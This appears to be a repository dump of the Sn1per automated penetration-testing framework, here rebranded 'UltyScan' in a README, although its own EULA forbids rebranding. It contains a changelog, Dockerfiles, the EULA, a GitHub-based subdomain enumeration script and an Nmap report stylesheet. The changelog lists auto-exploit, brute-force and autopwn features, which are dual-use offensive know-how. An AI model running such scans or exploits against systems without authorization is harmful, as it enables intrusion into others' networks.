* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
* v2.2d - Added MongoDB checks
* v2.2d - Improved NMap scanning options
* v2.2c - Added CouchDB checks
* v2.2c - Updated Sub-domain takeover list
* v2.2b - Added fullportonly mode to do exclusive full port scans
* v2.2b - Fixed minor issue with Metasploit Pro not starting
* v2.2b - Fixed minor issue with sniper loot command
* v2.2a - Fixed minor issue with loot function
* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
* v2.2 - Added Sn1per workspaces to loot directory
* v2.1d - Added crt.sh sub-domain check
* v2.1d - Removed blank screenshots from loot directory
* v2.1c - Fixed issue with install.sh install directories
* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
* v2.1b - Removed Zenmap
* v2.1a - Separated Arachni reports for port 80/443/tcp
* v2.1a - Fixed NMap full port scan options
* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
* v2.1 - Added full NMap detailed port scans
* v2.1 - Added port 4443/tcp checks
* v2.1 - Added META tag scans for web apps
* v2.1 - Removed Uniscan from web mode
* v2.1 - Removed SQLMap from web mode
* v2.0b - Added help option --help
* v2.0a - Fixed issue with ssh-audit
* v2.0a - Fixed issue with 'discover' mode
* v2.0 - Updated sub-domain takeover list
* v2.0 - Improved scan performance for stealth, airstrike and discover modes
* v2.0 - Removed jexboss due to clear screen issue with output
* v2.0 - Auto loot directory sorting for all tools
* v2.0 - Updated install.sh package list
* v1.9c - Enabled BruteX automated brute force attacks
* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
* v1.9a - Removed testssl script from stealth mode scans
* v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
* v1.9 - Added automatic loot directory sorting for all modes
* v1.9 - Added MSSQL port 1433/tcp checks
* v1.9 - Added SNMP port 162/tcp checks (@hexageek)
* v1.9 - Added nslookup to install.sh
* v1.9 - Fixed install.sh dependency duplicates
* v1.8c - Added -A option to all NMap port scans
* v1.8c - Fixed install.sh permission issue
* v1.8c - Fixed install.sh cleanup options
* v1.8c - Added ssh-audit
* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
* v1.8c - Fixed issue with Metasploit SSH scans
* v1.8c - Added auto-update to install.sh to automatically pull latest github release
* v1.8b - Fixed bug with NMap UDP scan options
* v1.8b - Fixed install.sh dependencies
* v1.8b - Fixed jexboss options
* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
* v1.8 - Added sub-domain hijack scans for all sub-domains
* v1.8 - Added auto explort of all sub-domains to /domains directory
* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
* v1.8 - Fixed issue with theHarvester not working with google
* v1.7g - Added email security/spoofing checks
* v1.7f - Added Zenmap XML auto-imports
* v1.7f - Added ClamAV RCE Nmap script
* v1.7e - Fixed minor issue with airstrike and nuke mode
* v1.7e - Fixed minor issues with discover mode
* v1.7e - Added minor cosmetic improvements to reports
* v1.7e - Disabled automatic brute forcing by default
* v1.7e - Added automatic brute force setting in script vars
* v1.7d - Added sslyze
* v1.7d - Added 'discover' mode for full subnet scans
* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
* v1.7c - Added plain text reporting
* v1.7c - Improved loot directory structure and sorting
* v1.7b - Fixed issue with airstrike mode not scanning correctly
* v1.7b - Improved passive recon performance
* v1.7a - Improved NMap http scan performance
* v1.7a - Removed joomscan due to verbosity issues
* v1.7 - Added uniscan web vulnerability scanner
* v1.7 - Added joomscan Joomla scanner
* v1.7 - Improved web scan performance
* v1.7 - Fixed issue with inurlbr output
* v1.7 - Added remote desktop viewing for RDP connections
* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
* v1.6e - Improved SMB scan performance/optimization added
* v1.6d - Improved NMap scan performance options
* v1.6d - Added xprobe2 OS finger printing tool
* v1.6d - Added jexbos JBoss autopwn
* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
* v1.6c - Add report mode for web scans
* v1.6c - Fixed issues with Sublist3r and theharvester
* v1.6c - Added Shocker Shellshock exploitation scanner
* v1.6b - Added Sublist3r sub-domain brute tool
* v1.6b - Added cutycapt web screenshot util
* v1.6a - Added improvements to recon phase
* v1.6a - Fixed small issue with 3rd party extension
* v1.6a - Various improvements to overall optimization of scans
* v1.6a - Added new "web" mode for full web application scans
* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
* v1.6 - Added Java de-serialization scanner
* v1.6 - Added reporting option to output to console and text file for all scans
* v1.6 - Added option to set Sn1per full path for universal command line access
* v1.6 - Added in DirBuster for web file brute forcing
* v1.6 - Fixed issue with sderr errors in TheHarvester
* v1.5e - Removed shodan command line tool due to issues
* v1.5e - Fixed wafwoof installation in kali 2.0
* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
* v1.5c - Fixed issue which broke link to sniper directory
* v1.5b - Added Squid Proxy checks port 3128/tcp
* v1.5b - Fixed shodan setup options in install.sh
* v1.5b - Fixed syntax error with theHarvester in install.sh
* v1.5a - Fixed syntax error with port 8081 checks
* v1.5a - Added Arachni integration
* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
* v1.5 - Added Metasploit scan and auto-exploit modules
* v1.5 - Added additional port checks
* v1.5 - Added full TCP/UDP NMap XML output
* v1.5 - Auto tune scan for either IP or hostname/domain
* v1.4h - Added auto IP/domain name scan configurations
* v1.4g - Added finger enumeration scripts
* v1.4g - Fixed nmap -p 445 target issue
* v1.4g - Fixed smtp-enum target issue
* v1.4f - Fixed BruteX directory bug
* v1.4e - Fixed reported errors install.sh
* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
* v1.4d - Fixed missing rake gem install dependency
* v1.4c - Reordered 3rd party extensions
* v1.4b - Fixed install.sh executable references
* v1.4b - Fixed Yasou dependencies in install.sh
* v1.4b - Fixed minor issues with BruteX loot directory
* v1.4 - Added Yasou for automatic web form brute forcing
* v1.4 - Added MassBleed for SSL vulnerability detection
* v1.4 - Added Breach-Miner for detection of breached accounts
* v1.4 - Fixed minor errors with nmap
* v1.4 - Removed debug output from goohak from displaying on console

34
Dockerfile Normal file
View File

@@ -0,0 +1,34 @@
FROM docker.io/kalilinux/kali-rolling:latest
LABEL org.label-schema.name='Sn1per - Kali Linux' \
org.label-schema.description='Automated pentest framework for offensive security experts' \
org.label-schema.usage='https://github.com/1N3/Sn1per' \
org.label-schema.url='https://github.com/1N3/Sn1per' \
org.label-schema.vendor='https://sn1persecurity.com' \
org.label-schema.schema-version='1.0' \
org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \
MAINTAINER="@xer0dayz"
RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \
echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
ENV DEBIAN_FRONTEND noninteractive
RUN set -x \
&& apt -yqq update \
&& apt -yqq full-upgrade \
&& apt clean
RUN apt install --yes metasploit-framework
RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \
service postgresql start && \
msfdb reinit
WORKDIR /usr/src/app
RUN apt --yes install git bash
RUN git clone https://github.com/1N3/Sn1per.git \
&& cd Sn1per \
&& ./install.sh \
&& sniper -u force
CMD ["sniper"]

9
Dockerfile.blackarch Normal file
View File

@@ -0,0 +1,9 @@
FROM docker.io/blackarchlinux/blackarch:latest
# Upgrade system
RUN pacman -Syu --noconfirm
# Install sn1per from official repository
RUN pacman -Sy sn1per --noconfirm
CMD ["sn1per"]

30
LICENSE.md Normal file
View File

@@ -0,0 +1,30 @@
## LICENSE:
Sn1per Community Edition End User License Agreement (EULA)
Sn1perSecurity LLC grants you the right to download, use, and distribute in part or in whole Sn1per Community Edition (also referred to as “Project”, “Code”, “Software”, “Sn1per”, “Product”), provided the following terms and conditions are met:
(1) You agree to give credit to the original author @xer0dayz and link back to https://sn1persecurity.com (Sn1perSecurity LLC)
(2) You may not rename or rebrand the Project.
(3) You agree not to create any product or service from any par of the Code from this Project, paid or free.
(4) You agree not to re-license the Code.
(5) You may not use the Code for illegal or nefarious purposes, which violates any laws (in your jurisdiction, the jurisdiction in which the Software is running, the jurisdiction in which the Software is targeting, and the United States of America).
(6) You agree not to scan a target in a manner that is considered unlawful, illegal, or that you do not have explicit permission to do so.
This Software is provided as-is without warranty. Sn1perSecurity LLC, its creators and staff take no liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity LLC or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this Product, even if Sn1perSecurity LLC has been advised of the possibility of such damages.
Sn1perSecurity LLC does not guarantee any functionality or performance of Sn1per Community Edition. Sn1perSecurity LLC does not warrant that the Code will be maintained and in good working order, or that the Software will meet your requirements, be uninterrupted, or error free, or that any errors in the Software will be corrected.
The Software code, name, and logos are owned by Sn1perSecurity LLC and protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions. All rights reserved.
Sn1perSecurity LLC reserves the right to change the licensing terms at any time, without advance notice. Sn1perSecurity LLC reserves the right to terminate your license at any time.
If any provision of this EULA is determined to be unlawful, void, or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from this EULA. Such determination shall not affect the validity and enforceability of any remaining provisions.
Failure of Sn1perSecurity LLC to exercise or enforce any right or provision of this EULA does not constitute a waiver of such right or provision.
Any ambiguities in the interpretation of this EULA shall not be construed against the drafting party/parties.
Download, use, distribution (in part or in whole) of this Project/Code constitutes your acceptance of the Sn1per Community Edition EULA. If at any time you are not in agreement or cannot meet any part of this EULA, you should immediately cease use of the Project by removing/uninstalling all copies from all locations.
For any questions concerning this EULA, please submit a GitHub issue with your question: https://github.com/1N3/Sn1per

51
README.md Normal file
View File

@@ -0,0 +1,51 @@
# UltyScan
## Professional Attack Surface Management Platform
**UltyScan** is a next-generation automated information gathering and vulnerability scanning tool. It is designed to be the ultimate "button-pushing" solution for penetration testers and security professionals, automating the execution of dozens of powerful open-source tools to discover hidden assets and vulnerabilities.
### 🚀 Key Features
* **Automated Recon**: Automatically gathers subdomains, IPs, and open ports.
* **Vulnerability Scanning**: Integrates with tools like Nikto, Zap, and OpenVAS to find weaknesses.
* **Multiple Modes**: From "Stealth" (low profile) to "Nuke" (full aggressive audit).
* **Visual Reports**: Generates HTML reports with all findings, including screenshots.
* **Workspace Management**: Keeps different client data separate and organized.
---
### 📚 Documentation
For detailed instructions, please refer to our comprehensive guides:
* **[Installation Guide](docs/installation.md)**
* Step-by-step setup for Kali Linux, Ubuntu, and Docker.
* **[Usage Guide](docs/usage.md)**
* How to run scans, understand modes, and manage workspaces.
* **[Configuration Guide](docs/configuration.md)**
* Customizing the scanner and setting up API keys (Shodan, Censys, etc.).
---
### ⚡ Quick Start
1. **Install**:
```bash
git clone https://github.com/1N3/Sn1per
cd Sn1per
sudo bash install.sh
```
2. **Run a Basic Scan**:
```bash
sudo sniper -t example.com
```
3. **View Results**:
Open the generated HTML report inside the `loot/workspace/` directory.
---
### NOTE
This tool is for legal security auditing purposes only. Ensure you have permission to scan the target.
*Based on the open-source Sn1per project.*

137
bin/github-subdomains.py Normal file
View File

@@ -0,0 +1,137 @@
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
TOKENS_FILE = os.path.dirname(os.path.realpath(__file__))+'/.tokens'
def githubApiSearchCode( search, page ):
headers = {"Authorization":"token "+random.choice(t_tokens)}
url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page)
# print(url)
try:
r = requests.get( url, headers=headers, timeout=5 )
json = r.json()
return json
except Exception as e:
print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) )
return False
def getRawUrl( result ):
raw_url = result['html_url'];
raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' )
raw_url = raw_url.replace( '/blob/', '/' )
return raw_url;
def readCode( regexp, source, result ):
url = getRawUrl( result )
code = doGetCode( url )
# print(code)
if code:
matches = re.findall( regexp, code )
if matches:
for sub in matches:
# print(sub)
sub = sub[0].replace('2F','').lower().strip()
if len(sub) and not sub in t_history:
t_history.append( sub )
sys.stdout.write( "%s" % sub )
if source:
sys.stdout.write( "\t-> %s" % result['html_url'] )
sys.stdout.write( "\n" )
def doGetCode( url ):
# print( url )
try:
r = requests.get( url, timeout=5 )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
return r.text
parser = argparse.ArgumentParser()
parser.add_argument( "-t","--token",help="auth token (required)" )
parser.add_argument( "-d","--domain",help="domain you are looking for (required)" )
parser.add_argument( "-e","--extend",help="also look for <dummy>example.com", action="store_true" )
parser.add_argument( "-s","--source",help="display first url where subdomains are found", action="store_true" )
parser.parse_args()
args = parser.parse_args()
t_tokens = []
if args.token:
t_tokens = args.token.split(',')
else:
if os.path.isfile(TOKENS_FILE):
fp = open(TOKENS_FILE,'r')
t_tokens = fp.read().split("\n")
fp.close()
if not len(t_tokens):
parser.error( 'auth token is missing' )
if args.source:
_source = True
else:
_source = False
if args.domain:
_domain = args.domain
else:
parser.error( 'domain is missing' )
t_history = []
page = 1
_search = '"' + _domain + '"'
### this is a test, looks like we got more result that way
import tldextract
t_host_parse = tldextract.extract( _domain )
_search = '"' + t_host_parse.domain + '"'
# print( t_host_parse )
# exit()
###
# egrep -io "[0-9a-z_\-\.]+\.([0-9a-z_\-]+)?`echo $h|awk -F '.' '{print $(NF-1)}'`([0-9a-z_\-\.]+)?\.[a-z]{1,5}"
if args.extend:
# _regexp = r'[0-9a-zA-Z_\-\.]+' + _domain.replace('.','\.')
_regexp = r'([0-9a-z_\-\.]+\.([0-9a-z_\-]+)?'+t_host_parse.domain+'([0-9a-z_\-\.]+)?\.[a-z]{1,5})'
else:
_regexp = r'(([0-9a-zA-Z_\-\.]+)\.' + _domain.replace('.','\.')+')'
# print(_regexp)
# for page in range(1,10):
while True:
time.sleep( 1 )
t_json = githubApiSearchCode( _search, page )
# print(t_json)
page = page + 1
if not t_json or 'documentation_url' in t_json or not 'items' in t_json or not len(t_json['items']):
break
pool = Pool( 30 )
pool.map( partial(readCode,_regexp,_source), t_json['items'] )
pool.close()
pool.join()

11145
bin/http-default-accounts-fingerprints-nndefaccts.lua Normal file
View File

File diff suppressed because it is too large Load Diff

281
bin/nmap-bootstrap.xsl Normal file
View File

@@ -0,0 +1,281 @@
<?xml version="1.0" encoding="utf-8"?>
<!--
Nmap Bootstrap XSL
Creative Commons BY-SA
Andreas Hontzia (@honze_net)
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" encoding="utf-8" indent="yes" doctype-system="about:legacy-compat"/>
<xsl:template match="/">
<html lang="en">
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"/>
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css"/>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.target:before {
content: "";
display: block;
height: 50px;
margin: -20px 0 0;
}
@media only screen and (min-width:1900px) {
.container {
width: 1800px;
}
}
.footer {
margin-top:60px;
padding-top:60px;
width: 100%;
height: 180px;
background-color: #f5f5f5;
}
</style>
<title>Scan Report Nmap <xsl:value-of select="/nmaprun/@version"/></title>
</head>
<body>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"><span class="glyphicon glyphicon-home"></span></a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="#scannedhosts">Scanned Hosts</a></li>
<li><a href="#onlinehosts">Online Hosts</a></li>
<li><a href="#openservices">Open Services</a></li>
</ul>
</div>
</div>
</nav>
<div class="container">
<div class="jumbotron">
<h1>Scan Report<br/><small>Nmap <xsl:value-of select="/nmaprun/@version"/></small></h1>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="/nmaprun/@args"/></pre>
<p class="lead">
<xsl:value-of select="/nmaprun/@startstr"/> <xsl:value-of select="/nmaprun/runstats/finished/@timestr"/><br/>
<xsl:value-of select="/nmaprun/runstats/hosts/@total"/> hosts scanned.
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/> hosts up.
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/> hosts down.
</p>
<div class="progress">
<div class="progress-bar progress-bar-success" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@up div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/>
<span class="sr-only"></span>
</div>
<div class="progress-bar progress-bar-danger" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@down div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/>
<span class="sr-only"></span>
</div>
</div>
</div>
<h2 id="scannedhosts" class="target">Scanned Hosts<xsl:if test="/nmaprun/runstats/hosts/@down > 1024"><small> (offline hosts are hidden)</small></xsl:if></h2>
<div class="table-responsive">
<table id="table-overview" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>State</th>
<th>Address</th>
<th>Hostname</th>
<th>TCP (open)</th>
<th>UDP (open)</th>
</tr>
</thead>
<tbody>
<xsl:choose>
<xsl:when test="/nmaprun/runstats/hosts/@down > 1024">
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:when>
<xsl:otherwise>
<xsl:for-each select="/nmaprun/host">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:otherwise>
</xsl:choose>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-overview').DataTable();
});
</script>
<h2 id="onlinehosts" class="target">Online Hosts</h2>
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><xsl:value-of select="address/@addr"/><xsl:if test="count(hostnames/hostname) > 0"> - <xsl:value-of select="hostnames/hostname/@name"/></xsl:if></h3>
</div>
<div class="panel-body">
<xsl:if test="count(hostnames/hostname) > 0">
<h4>Hostnames</h4>
<ul>
<xsl:for-each select="hostnames/hostname">
<li><xsl:value-of select="@name"/> (<xsl:value-of select="@type"/>)</li>
</xsl:for-each>
</ul>
</xsl:if>
<h4>Ports</h4>
<div class="table-responsive">
<table class="table table-bordered">
<thead>
<tr>
<th>Port</th>
<th>Protocol</th>
<th>State<br/>Reason</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>Extra Info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="ports/port">
<xsl:choose>
<xsl:when test="state/@state = 'open'">
<tr class="success">
<td title="Port"><xsl:value-of select="@portid"/></td>
<td title="Protocol"><xsl:value-of select="@protocol"/></td>
<td title="State / Reason"><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td title="Service"><xsl:value-of select="service/@name"/></td>
<td title="Product"><xsl:value-of select="service/@product"/></td>
<td title="Version"><xsl:value-of select="service/@version"/></td>
<td title="Extra Info"><xsl:value-of select="service/@extrainfo"/></td>
</tr>
<tr>
<td colspan="7">
<a><xsl:attribute name="href">https://nvd.nist.gov/vuln/search/results?form_type=Advanced&amp;cves=on&amp;cpe_version=<xsl:value-of select="service/cpe"/></xsl:attribute><xsl:value-of select="service/cpe"/></a>
<xsl:for-each select="script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'filtered'">
<tr class="warning">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'closed'">
<tr class="active">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:otherwise>
<tr class="info">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:otherwise>
</xsl:choose>
</xsl:for-each>
</tbody>
</table>
</div>
<xsl:if test="count(hostscript/script) > 0">
<h4>Host Script</h4>
</xsl:if>
<xsl:for-each select="hostscript/script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</div>
</div>
</xsl:for-each>
<h2 id="openservices" class="target">Open Services</h2>
<div class="table-responsive">
<table id="table-services" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>Address</th>
<th>Port</th>
<th>Protocol</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>CPE</th>
<th>Extra info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="/nmaprun/host">
<xsl:for-each select="ports/port[state/@state='open']">
<tr>
<td><xsl:value-of select="../../address/@addr"/><xsl:if test="count(../../hostnames/hostname) > 0"> - <xsl:value-of select="../../hostnames/hostname/@name"/></xsl:if></td>
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/cpe"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:for-each>
</xsl:for-each>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-services').DataTable();
});
</script>
</div>
<footer class="footer">
<div class="container">
<p class="text-muted">
This report was generated with <a href="https://github.com/honze-net/nmap-bootstrap-xsl">Nmap Bootstrap XSL</a>.<br/>
Licensed under <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons BY-SA</a>.<br/>
Designed and built by Andreas Hontzia (<a href="https://www.twitter.com/honze_net">@honze_net</a>).<br/>
</p>
</div>
</footer>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

601
bin/pyText2pdf.py Normal file
View File

@@ -0,0 +1,601 @@
#! /usr/bin/env python
"""
pyText2Pdf - Python script to convert plain text files into Adobe
Acrobat PDF files with support for arbitrary page breaks etc.
Version 2.0
Author: Anand B Pillai <abpillai at gmail dot com>
"""
# Derived from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/189858
import sys, os
import string
import time
import optparse
import re
LF_EXTRA=0
LINE_END='\015'
# form feed character (^L)
FF=chr(12)
ENCODING_STR = """\
/Encoding <<
/Differences [ 0 /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /space /exclam
/quotedbl /numbersign /dollar /percent /ampersand
/quoteright /parenleft /parenright /asterisk /plus /comma
/hyphen /period /slash /zero /one /two /three /four /five
/six /seven /eight /nine /colon /semicolon /less /equal
/greater /question /at /A /B /C /D /E /F /G /H /I /J /K /L
/M /N /O /P /Q /R /S /T /U /V /W /X /Y /Z /bracketleft
/backslash /bracketright /asciicircum /underscore
/quoteleft /a /b /c /d /e /f /g /h /i /j /k /l /m /n /o /p
/q /r /s /t /u /v /w /x /y /z /braceleft /bar /braceright
/asciitilde /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/.notdef /.notdef /.notdef /.notdef /.notdef /.notdef
/dotlessi /grave /acute /circumflex /tilde /macron /breve
/dotaccent /dieresis /.notdef /ring /cedilla /.notdef
/hungarumlaut /ogonek /caron /space /exclamdown /cent
/sterling /currency /yen /brokenbar /section /dieresis
/copyright /ordfeminine /guillemotleft /logicalnot /hyphen
/registered /macron /degree /plusminus /twosuperior
/threesuperior /acute /mu /paragraph /periodcentered
/cedilla /onesuperior /ordmasculine /guillemotright
/onequarter /onehalf /threequarters /questiondown /Agrave
/Aacute /Acircumflex /Atilde /Adieresis /Aring /AE
/Ccedilla /Egrave /Eacute /Ecircumflex /Edieresis /Igrave
/Iacute /Icircumflex /Idieresis /Eth /Ntilde /Ograve
/Oacute /Ocircumflex /Otilde /Odieresis /multiply /Oslash
/Ugrave /Uacute /Ucircumflex /Udieresis /Yacute /Thorn
/germandbls /agrave /aacute /acircumflex /atilde /adieresis
/aring /ae /ccedilla /egrave /eacute /ecircumflex
/edieresis /igrave /iacute /icircumflex /idieresis /eth
/ntilde /ograve /oacute /ocircumflex /otilde /odieresis
/divide /oslash /ugrave /uacute /ucircumflex /udieresis
/yacute /thorn /ydieresis ]
>>
"""
INTRO="""\
%prog [options] filename
PyText2Pdf makes a 7-bit clean PDF file from any input file.
It reads from a named file, and writes the PDF file to a file specified by
the user, otherwise to a file with '.pdf' appended to the input file.
Author: Anand B Pillai."""
class PyText2Pdf(object):
""" Text2pdf converter in pure Python """
def __init__(self):
# version number
self._version="1.3"
# iso encoding flag
self._IsoEnc=False
# formfeeds flag
self._doFFs=False
self._progname="PyText2Pdf"
self._appname = " ".join((self._progname,str(self._version)))
# default font
self._font="/Courier"
# default font size
self._ptSize=10
# default vert space
self._vertSpace=12
self._lines=0
# number of characters in a row
self._cols=80
self._columns=1
# page ht
self._pageHt=792
# page wd
self._pageWd=612
# input file
self._ifile=""
# output file
self._ofile=""
# default tab width
self._tab=4
# input file descriptor
self._ifs=None
# output file descriptor
self._ofs=None
# landscape flag
self._landscape=False
# Subject
self._subject = ''
# Author
self._author = ''
# Keywords
self._keywords = []
# Custom regexp for page breaks
self._pagebreakre = None
# marker objects
self._curobj = 5
self._pageObs = [0]
self._locations = [0,0,0,0,0,0]
self._pageNo=0
# file position marker
self._fpos=0
def parse_args(self):
""" Callback function called by argument parser.
Helps to remove duplicate code """
if len(sys.argv)<2:
sys.argv.append('-h')
parser = optparse.OptionParser(usage=INTRO)
parser.add_option('-o','--output',dest='outfile',help='Direct output to file OUTFILE',metavar='OUTFILE')
parser.add_option('-f','--font',dest='font',help='Use Postscript font FONT (must be in standard 14, default: Courier)',
default='Courier')
parser.add_option('-I','--isolatin',dest='isolatin',help='Use ISO latin-1 encoding',default=False,action='store_true')
